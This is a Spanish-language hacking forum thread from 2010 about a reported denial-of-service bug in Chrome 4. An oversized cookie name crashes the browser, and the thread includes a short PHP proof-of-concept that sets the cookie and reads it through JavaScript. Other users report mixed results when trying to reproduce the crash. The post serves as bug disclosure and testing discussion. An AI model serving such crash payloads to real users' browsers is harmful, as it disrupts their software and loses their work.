elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
25 Mayo 2012, 05:18  


Tema destacado: Recuerda que debes registrarte en el foro para poder participar (preguntar y responder)

+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits (Moderador: berz3k)
| | |-+  0Day en Google Chrome 4.0.2 estable (Denegación de servicio al procesar cookies)
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: 0Day en Google Chrome 4.0.2 estable (Denegación de servicio al procesar cookies)  (Leído 2,893 veces)
WHK
吴阿卡
Ex-Staff
*
Desconectado Desconectado

Mensajes: 4.113


The Hacktivism is not a crime


Ver Perfil WWW
0Day en Google Chrome 4.0.2 estable (Denegación de servicio al procesar cookies)
« en: 12 Marzo 2010, 21:53 »

estuve un dia de ocio buscando bugs en chrome y al darle una cookie de 1500 carácteres crasheó, no respondió cayendo el software con pestañas y todo (pestañas que por cierto no son recuperables como firefox).

El problema no es que la cookie contenga 1500 carácteres de valor sino de nombre.
El explorador si podrá almacenar esta cookie pero al momento de ser usada desde javascript este causará una denegación de servicio.

http://code.google.com/p/chromium/issues/detail?id=37650

Aun no se sabe que causa esto ya que se ha intentado reproducir el mismo bug en las mismas condiciones que las mias sin resultado pero últimamente han habido bastantes reportes de esta anormalía.

Prueba de concepto:
Código
<?php
header('Set-Cookie: '.str_repeat('x', 1500).'='.str_repeat('x', 1500).';');
// www.webcomparte.com/archivos_publicos/otros/chrome_bug.php
?>
:)
<script>alert(document.cookie);</script>
 
En línea

Mi foro Ultra Off-Topics: http://whk.drawcoders.com/foro/

Gracias a todos! Good bye!
AlbertoBSD
Estudiante y
Colaborador
***
Desconectado Desconectado

Mensajes: 1.955


Anonymous & Paranoid


Ver Perfil WWW
Re: 0Day en Google Chrome 4.0.2 estable (Denegación de servicio al procesar cookies)
« Respuesta #1 en: 12 Marzo 2010, 22:35 »

Esta interesante, de hecho el otro dia estaba tratando de mostrar unos mensajes con el alert en chrome y dardo varios minutos en procesaros, y firefox lo procesa al instante.


Es muy extraño

Saludos
En línea

Bien Super Divertido
@wifigdlmx
bizco


Desconectado Desconectado

Mensajes: 698


Ver Perfil
Re: 0Day en Google Chrome 4.0.2 estable (Denegación de servicio al procesar cookies)
« Respuesta #2 en: 13 Marzo 2010, 02:19 »

En mi caso me muestra la alerta, sin mas.
En línea
WHK
吴阿卡
Ex-Staff
*
Desconectado Desconectado

Mensajes: 4.113


The Hacktivism is not a crime


Ver Perfil WWW
Re: 0Day en Google Chrome 4.0.2 estable (Denegación de servicio al procesar cookies)
« Respuesta #3 en: 13 Marzo 2010, 19:52 »

Citar
Esta interesante, de hecho el otro dia estaba tratando de mostrar unos mensajes con el alert en chrome y dardo varios minutos en procesaros, y firefox lo procesa al instante.
Ese es otro bug que ya lo están reparando xD ya que si yo hago un alert gigante entonces tarda un poco pero se ve.
En este caso simplemente no se ve, crashea y se cuelga completo y puedes esperar el dia entero sin que se pueda recuperar.

Citar
En mi caso me muestra la alerta, sin mas.
Si, es raro, solo a algunos podemos reproducir el bug xD
En línea

Mi foro Ultra Off-Topics: http://whk.drawcoders.com/foro/

Gracias a todos! Good bye!
Karcrack


Desconectado Desconectado

Mensajes: 2.191


Se siente observado ¬¬'


Ver Perfil
Re: 0Day en Google Chrome 4.0.2 estable (Denegación de servicio al procesar cookies)
« Respuesta #4 en: 13 Marzo 2010, 23:41 »

Me muestra la alerta sin mas... Google Chrome 4.0.249.89 unknown (38071)
En línea

bizco


Desconectado Desconectado

Mensajes: 698


Ver Perfil
Re: 0Day en Google Chrome 4.0.2 estable (Denegación de servicio al procesar cookies)
« Respuesta #5 en: 14 Marzo 2010, 00:49 »

WHK esta chrome corriendo en una maquina virtual? a ver si por alguna razon fuese ese el "fallo" o la diferencia que hace que se muestre ese error.
En línea
WHK
吴阿卡
Ex-Staff
*
Desconectado Desconectado

Mensajes: 4.113


The Hacktivism is not a crime


Ver Perfil WWW
Re: 0Day en Google Chrome 4.0.2 estable (Denegación de servicio al procesar cookies)
« Respuesta #6 en: 15 Marzo 2010, 18:00 »

puede ser, yo lo corro en virtual box con win xp sp2 y 712mb de ram con aceleración de video habilitado de 128mb.
En línea

Mi foro Ultra Off-Topics: http://whk.drawcoders.com/foro/

Gracias a todos! Good bye!
[Zero]
Wiki

Desconectado Desconectado

Mensajes: 1.059


CALL DWORD PTR DS:[0]


Ver Perfil WWW
Re: 0Day en Google Chrome 4.0.2 estable (Denegación de servicio al procesar cookies)
« Respuesta #7 en: 15 Marzo 2010, 20:38 »

A mi me crashea, Win7 Chrome 4.0.249.89.

Saludos
En línea


“El Hombre, en su orgullo, creó a Dios a su imagen y semejanza.”
Nietzsche
WHK
吴阿卡
Ex-Staff
*
Desconectado Desconectado

Mensajes: 4.113


The Hacktivism is not a crime


Ver Perfil WWW
Re: 0Day en Google Chrome 4.0.2 estable (Denegación de servicio al procesar cookies)
« Respuesta #8 en: 15 Marzo 2010, 20:58 »

en virtual o no?
En línea

Mi foro Ultra Off-Topics: http://whk.drawcoders.com/foro/

Gracias a todos! Good bye!
[Zero]
Wiki

Desconectado Desconectado

Mensajes: 1.059


CALL DWORD PTR DS:[0]


Ver Perfil WWW
Re: 0Day en Google Chrome 4.0.2 estable (Denegación de servicio al procesar cookies)
« Respuesta #9 en: 15 Marzo 2010, 21:05 »

No, mi windows de todos los días  :P.

Saludos
En línea


“El Hombre, en su orgullo, creó a Dios a su imagen y semejanza.”
Nietzsche
Karcrack


Desconectado Desconectado

Mensajes: 2.191


Se siente observado ¬¬'


Ver Perfil
Re: 0Day en Google Chrome 4.0.2 estable (Denegación de servicio al procesar cookies)
« Respuesta #10 en: 16 Marzo 2010, 00:37 »

Yo lo ejecuto en W$ XP SP3... talvez sea cosa del S.O :P
En línea

Freeze.


Desconectado Desconectado

Mensajes: 2.731



Ver Perfil WWW
Re: 0Day en Google Chrome 4.0.2 estable (Denegación de servicio al procesar cookies)
« Respuesta #11 en: 16 Marzo 2010, 03:44 »

A mi me crashea, Win7 Chrome 4.0.249.89.

Saludos
A mi No, misma version y en mi OS de todos los días...
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Chrome 10 alcanza su versión estable
Noticias
wolfbcn 0 532 Último mensaje 9 Marzo 2011, 13:56
por wolfbcn
Chrome permitirá eliminar las cookies de Flash
Noticias
wolfbcn 0 453 Último mensaje 27 Abril 2011, 22:53
por wolfbcn
Chrome 12 alcanza su versión estable
Noticias
wolfbcn 0 354 Último mensaje 8 Junio 2011, 13:33
por wolfbcn
Lanzamiento de Google Chrome 13 estable
Noticias
Dreamaker 1 1,266 Último mensaje 3 Agosto 2011, 00:00
por Dreamaker
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines